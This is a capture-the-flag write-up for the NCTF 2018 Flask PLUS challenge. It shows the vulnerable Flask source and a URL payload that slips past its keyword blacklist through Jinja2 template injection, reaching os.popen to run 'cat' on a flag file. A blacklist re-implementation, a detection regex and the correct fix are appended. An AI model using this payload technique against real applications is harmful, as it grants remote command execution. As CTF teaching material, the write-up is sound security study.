Writeup for [NCTF 2018]Flask PLUS

2025-09-24 20:00 By BITs2SysPlayer0
SSTI, Python, Flask

Problem: [NCTF 2018]Flask PLUS

The source code can be obtained through SSTI:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
import os
from urllib import parse

app = Flask(__name__)


@app.route("/")
def index():
    "Home page"
    return render_template("index2.html")


@app.errorhandler(404)
def page_not_found(e):
    def safe_jinja(s):
        # Case-insensitive substring blacklist applied to the decoded URL
        blacklist = [
            'import', 'getattr', 'os', 'class', 'subclasses', 'mro',
            'request', 'args', 'eval', 'if', 'for', 'subprocess', 'file',
            'open', 'popen', 'builtins', 'compile', 'execfile',
            'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
            'getattribute', 'func_globals', '__init__', 'join', '__dict__'
        ]
        flag = True
        for no in blacklist:
            if no.lower() in s.lower():
                # print(no.lower())
                flag = False
                break
        return flag

    # The decoded request URL is formatted into the template source itself,
    # so any Jinja2 syntax in the URL is evaluated when the template renders.
    template = '''
{%% block body %%}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
{%% endblock %%}
''' % (parse.unquote(request.url))
    # print(parse.unquote(request.url), safe_jinja(parse.unquote(request.url)))
    if safe_jinja(parse.unquote(request.url)):
        return render_template_string(template), 404
    else:
        return render_template("404.html"), 404


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)
```

The flag is at ../../../Th1s_is__F1114g. Oddly, this challenge seems to limit the length of a single string, so the path can be written as 'cat ../..'+'/..'+'/Th1s_is__F1114g'

Payload

http://node4.anna.nssctf.cn:28442/%7B%7Blipsum.__globals__['o'+'s']['po'+'pen']('cat ../..'+'/..'+'/Th1s_is__F1114g').read()%7D%7D
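
Why the substring blacklist does not help, as an added example that is not part of the original writeup: the `safe_jinja` decision is re-implemented with the page's blacklist and run over constructed request paths, next to a hypothetical delimiter-based detection rule. The names `blacklist_allows`, `has_template_syntax`, `triage` and `SAMPLES` are assumptions made for this example.

```python
import re
from urllib import parse

# Blacklist copied from the challenge source shown above.
BLACKLIST = [
    'import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request',
    'args', 'eval', 'if', 'for', 'subprocess', 'file', 'open', 'popen',
    'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local',
    'self', 'item', 'getitem', 'getattribute', 'func_globals', '__init__',
    'join', '__dict__',
]

# Jinja2's default expression, statement and comment openers.
TEMPLATE_SYNTAX = re.compile(r"\{\{|\{%|\{#")


def blacklist_allows(url):
    """Same decision as safe_jinja(): case-insensitive substring match."""
    decoded = parse.unquote(url).lower()
    return not any(word in decoded for word in BLACKLIST)


def has_template_syntax(url):
    """Hypothetical detection rule: template delimiters in the decoded URL."""
    return bool(TEMPLATE_SYNTAX.search(parse.unquote(url)))


def triage(urls):
    """Return (url, blacklist_allows, has_template_syntax) for each URL."""
    return [(u, blacklist_allows(u), has_template_syntax(u)) for u in urls]


# Constructed sample paths (the real app checks the full request.url).
SAMPLES = [
    # Path portion of the payload given on this page.
    "/%7B%7Blipsum.__globals__['o'+'s']['po'+'pen']"
    "('cat ../..'+'/..'+'/Th1s_is__F1114g').read()%7D%7D",
    "/%7B%7Bconfig%7D%7D",  # template syntax, stopped only by the word 'config'
    "/posts/2018",          # benign, yet rejected because 'posts' contains 'os'
    "/about",               # benign
]

if __name__ == "__main__":
    for url, allowed, flagged in triage(SAMPLES):
        print(f"blacklist_allows={allowed!s:5} template_syntax={flagged!s:5} {url}")
```

The root fix is to keep the URL out of the template source and pass it as a render variable, for example `render_template_string(template, url=request.url)` with `{{ url }}` in the template, so Jinja2 treats it as data and autoescapes it.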